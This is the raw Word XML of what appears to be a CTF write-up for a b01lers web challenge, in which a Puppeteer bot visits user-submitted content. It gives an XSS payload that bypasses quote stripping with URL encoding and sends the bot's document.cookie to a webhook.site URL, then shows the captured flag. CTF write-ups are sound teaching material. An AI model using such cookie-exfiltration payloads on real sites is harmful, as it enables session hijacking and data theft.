                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>app.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">'/review', limiter, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>, res) function is a Node.js server-side endpoint that uses Puppeteer to interact with a (server side) web browser programmatically. It takes a request body, parses its content, and then visits a specific URL on the application's domain using Puppeteer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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2547" w:rsidRDefault="00B02547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lastRenderedPageBreak/>
              <w:t>Long Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidRPr="00B059C7" w:rsidTr="00B02547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59C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Placing this payload inside of the 'message' field of the page form will lead to a call to the given </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>webhook</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the puppeteer browser:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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https://webhook.site/99853521-2093-4f3e-8f5a-8310bf862879</w:t>
            </w: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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Now we need to get the puppeteer browser to send its cookies as a request parameter to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>webhook</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333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059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>. The problem is, that the content is sanitized via</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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content = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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req.body</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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.content.replace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"'"</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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).replace(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'"'</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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).replace(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"`"</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">So we need to find alternatives for the replaced characters. As the whole content gets passed in a URL parameter, we can make this script run successfully to call our </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>webhook</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> using URL encoding (' = %27) for the replaced chars:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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script</w:t>
            </w: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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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function</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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setUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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    e = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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document</w:t>
            </w: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.getElementById</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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asd%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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e.src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= %</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7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27.</w:t>
            </w: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concat</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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(%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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https:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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//webhook.site/99853521-2093-4f3e-8f5a-8310bf862879?cookies=%27,%27asdf2%27);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B02547" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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333333"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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%27setUrl()%27</w:t>
            </w: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id=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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%27asd%27</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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%27https://b01lersc.tf/assets/logo.svg%27</w:t>
            </w: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&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidTr="00B02547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2547" w:rsidRDefault="00B02547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rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="36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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02547" w:rsidRPr="00B02547" w:rsidTr="00B02547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59C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Now we just need to extract the sites 'flag' cookie:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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script</w:t>
            </w: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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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function</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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setUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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    e = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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document</w:t>
            </w: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.getElementById</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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asd%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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       </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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e.src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= %</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7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27.</w:t>
            </w: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concat</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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(%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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27</w:t>
            </w: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https:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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//webhook.site/99853521-2093-4f3e-8f5a-8310bf862879?cookies=%27,document.cookie);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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script</w:t>
            </w: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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:pP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&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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%27</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7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setUrl(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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)%27</w:t>
            </w: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id=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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%27asd%27</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000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%27https://b01lersc.tf/assets/logo.svg%27</w:t>
            </w:r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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>The flag is returned in the cookie URL parameter:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B02547" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pP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35" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart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bctf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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wow_you_can_get_a_free_ad_now</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="444444"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>!}</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B02547" w:rsidRDefault="00B02547" w:rsidP="00B02547">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p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B855E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5958D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2547"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="00B02547"/>
    <w:rsid w:val="00B059C7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72DA10"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{09DF92E7-F5DE-47A0-A76B-91152743C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Cisco-Обычный"/>
    <w:qFormat/>
    <w:rsid w:val="00B02547"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B02547"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:x="137" w:y="116"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="1F2328"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val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254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254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02547"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="1F2328"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00B02547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character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B02547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B02547"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default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B025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02547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Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B0254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ljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B02547"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B02547"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B02547"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B02547"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B02547"/>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B02547"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr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semiHidden/>
    <w:rsid w:val="00B02547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ljs-subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
